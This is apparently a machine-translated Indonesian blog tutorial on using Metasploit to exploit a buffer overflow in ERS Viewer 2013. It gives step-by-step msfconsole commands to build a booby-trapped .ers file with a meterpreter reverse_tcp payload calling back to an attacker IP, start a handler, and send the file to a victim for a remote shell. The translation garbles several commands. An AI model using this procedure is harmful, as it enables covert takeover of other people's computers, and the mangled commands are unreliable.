Modul ini mengeksploitasi kerentanan buffer overflow ditemukan di ERS Viewer 2013. Kerentanan yang ada di ermapper_u.dll modul, di mana fungsi rf_report_error menangani data pengguna disediakan dengan cara yang tidak aman. Hasilnya eksekusi kode sewenang-wenang dalam konteks pengguna melihat file khusus dibuat. Ers. Modul ini telah diuji dengan sukses dengan ERS Viewer 2013 (versi 13.0.0.1151) pada Windows XP SP3 dan Windows 7 SP1.
Exploit Target
ERS Viewer 2013
Kebutuhan
Penyerang : Kali Linux
Korban PC : Windows 7
Buka Kali Linux tipe terminal msfconsole
Sekarang ketik penggunaan mengeksploitasi / windows / fileformat / erdas_er_viewer_rf_report_error
msf exploit ( erdas_er_viewer_rf_report_error )> jendela set payload / meterpreter / reverse_tcp
msf exploit ( erdas_er_viewer_rf_report_error )> set LHOST 192.168.1.164 (IP Host lokal)
msf exploit ( erdas_er_viewer_rf_report_error )> mengeksploitasi
Setelah kami berhasil menghasilkan berbahaya ers File akan disimpan pada komputer lokal Anda
/ Root/.msf4/local/msf.ers
Sekarang kita perlu mengatur pendengar untuk menangani koneksi terbalik dikirim oleh korban ketika mengeksploitasi berhasil dieksekusi.
menggunakan mengeksploitasi / multi-/ handler
Jendela set payload / meterpreter / reverse_tcp
set LHOST 192.168.1.164
mengeksploitasi
Sekarang mengirim Anda msf.ers file ke korban, segera setelah mereka men-download dan membukanya. Sekarang Anda dapat mengakses meterpreter shell pada komputer korban.
sekian tutorial dari saya... :D
Content Creator : Antar Prasetya Yoga
0 comments:
Post a Comment